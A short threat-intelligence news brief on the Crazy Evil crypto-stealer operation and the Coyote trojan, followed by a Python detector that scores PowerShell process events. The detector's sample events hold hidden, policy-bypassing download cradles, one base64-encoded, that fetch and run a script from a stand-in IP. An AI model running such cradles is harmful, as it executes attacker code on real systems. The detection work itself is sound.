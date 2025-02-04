Malware, Threat Intelligence

Numerous malware deployed by crypto-targeting Crazy Evil operation

Russian cybercrime operation Crazy Evil has deployed the StealC, Atomic macOS Stealer (AMOS), and Angel Drainer payloads across more than 10 ongoing scam campaigns aimed at compromising cryptocurrency and other digital assets on Windows and macOS systems, according to The Hacker News.

Crazy Evil, which initially operated as a traffer network redirecting legitimate traffic to phishing sites, is composed of half a dozen sub-teams that distribute the StealC and AMOS stealers disguised as WeChat, Zoom, Selenium Finance, and other platforms, and it has also sought to provide crypter services for various malware, a report from Recorded Future's Insikt Group revealed. The findings come as the Insikt Group also detailed the TAG-124 traffic distribution system leveraged by the Rhysida and Interlock ransomware operations, among others. Separately, Trend Micro researchers reported that malicious GitHub-hosted installers were used to spread Lumma Stealer, Vidar Stealer, SectopRAT, and Cobalt Strike beacons.

Related

Updated Coyote malware facilitates more extensive compromise

Attacks with the new Coyote trojan variant over the past month began with an LNK file that executed a PowerShell command to retrieve a next-stage PowerShell script, which in turn launched the trojan. Once running, the trojan collected system details and a list of installed antivirus products and attempted to evade sandbox analysis, according to a Fortinet FortiGuard Labs study.
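The LNK-to-PowerShell-to-remote-script chain summarized above maps directly onto process-creation telemetry, which makes it a good candidate for a simple scoring detection. The script below is an added example and is not code from the Fortinet report or from SC Media: it scores process-creation events (the three fields mirror Sysmon Event ID 1's ParentImage, Image and CommandLine, which is an assumption about the log source) for a PowerShell launch parented by explorer.exe, a download cradle, and console-hiding or policy-bypass switches, and it decodes any -EncodedCommand payload before scanning so an obfuscated cradle is not missed. All four sample events are constructed for the example.

```python
"""Score process-creation events for the LNK -> PowerShell -> remote script chain.

Added example; sample events are constructed, not taken from any report.
Field names assume a Sysmon Event ID 1 style export (ParentImage, Image, CommandLine).
"""
import base64
import re
from dataclasses import dataclass, field


@dataclass
class ProcessEvent:
    """One process-creation record."""
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    event: ProcessEvent
    score: int
    reasons: list = field(default_factory=list)


POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")

# Remote-retrieval primitives: the "next-stage script retrieval" step.
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"Invoke-RestMethod|\birm\b|Start-BitsTransfer",
    re.I,
)
# Switches that hide the console or disable safeguards.
EVASION_RES = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "execution policy bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
}
# -EncodedCommand and its aliases carry base64 of a UTF-16LE script.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of an -EncodedCommand argument, or '' if absent or unparseable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError
        return ""


def analyze(ev: ProcessEvent) -> Finding:
    """Score one event; 0 means nothing of interest."""
    f = Finding(ev, 0)
    if not ev.image.lower().endswith(POWERSHELL_IMAGES):
        return f  # only PowerShell launches are in scope
    # A double-clicked LNK is launched by the shell, so explorer.exe is the parent.
    if ev.parent_image.lower().endswith("explorer.exe"):
        f.score += 1
        f.reasons.append("PowerShell spawned by explorer.exe (LNK/double-click launch)")
    decoded = decode_encoded_command(ev.command_line)
    if decoded:
        f.score += 1
        f.reasons.append("encoded command (decoded for inspection)")
    # Scan the visible command line and the decoded payload together.
    text = ev.command_line + " " + decoded
    if CRADLE_RE.search(text):
        f.score += 2
        f.reasons.append("remote script retrieval cradle")
    for name, rx in EVASION_RES.items():
        if rx.search(text):
            f.score += 1
            f.reasons.append(name)
    return f


def find_suspicious(events, threshold: int = 3):
    """Return findings at or above the alert threshold."""
    return [f for f in map(analyze, events) if f.score >= threshold]


# Constructed sample events. The fourth hides its cradle behind -enc, as attackers do.
ENCODED_STAGE2 = base64.b64encode(
    "IEX (iwr http://203.0.113.5/a.ps1)".encode("utf-16-le")).decode()
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", PS_IMAGE,
                 "powershell.exe -w hidden -nop -ep bypass -c \"IEX (New-Object "
                 "Net.WebClient).DownloadString('http://203.0.113.5/s2.ps1')\""),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 r"notepad.exe C:\Users\user\notes.txt"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS_IMAGE,
                 "powershell.exe -Command Get-Date"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS_IMAGE,
                 f"powershell.exe -enc {ENCODED_STAGE2}"),
]

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_EVENTS):
        print(finding.score, finding.reasons, finding.event.command_line[:60])
```

The weights are deliberately crude: the cradle is worth the most because retrieval of a remote script is the step the reported chain depends on, while an explorer.exe parent alone is normal for any user-launched PowerShell shortcut. Decoding -EncodedCommand before matching is what catches the fourth event; a rule that only inspects the visible command line scores it too low to alert.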
